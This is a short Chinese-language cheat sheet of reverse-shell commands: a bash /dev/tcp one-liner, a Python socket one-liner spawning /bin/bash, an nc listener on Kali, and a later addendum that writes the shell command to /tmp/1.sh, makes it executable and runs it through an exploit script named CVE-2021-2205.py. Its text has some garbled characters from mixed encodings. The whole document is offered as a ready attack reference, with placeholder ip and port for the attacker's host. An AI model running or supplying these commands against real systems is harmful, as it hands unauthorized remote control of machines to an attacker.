在某些情況下可能需要我們反彈一個(gè)shell來更好的執(zhí)行某些命令。就可以用到這些命令：

Bash反彈shell命令如下：

bash -i >& /dev/tcp/ip/port 0>&1

使用python反彈，反彈shell命令如下：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先，使用nc在kali上監(jiān)聽端口：

nc -lvvp 7777

2021-11-10新增寫文件反彈shell
反彈shell： (xxxx xxx xxx 代表運(yùn)行POC的一些命令 然后 -c 后面是執(zhí)行命令的地方）
xxxxxxx xxx xx -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" 這條語句意思是代表，將反彈shell命令寫成sh腳本 到tmp目錄下
xxxx xxxx xxxx -c "chmod +x /tmp/1.sh" 這條語句意思是代表，對寫入成功的sh腳本加執(zhí)行權(quán)限 CVE-2021-2205.py xxx xxx xxxx xxxxxx -c "/bin/bash /tmp/1.sh" 這條語句意思是代表，運(yùn)行反彈shell腳本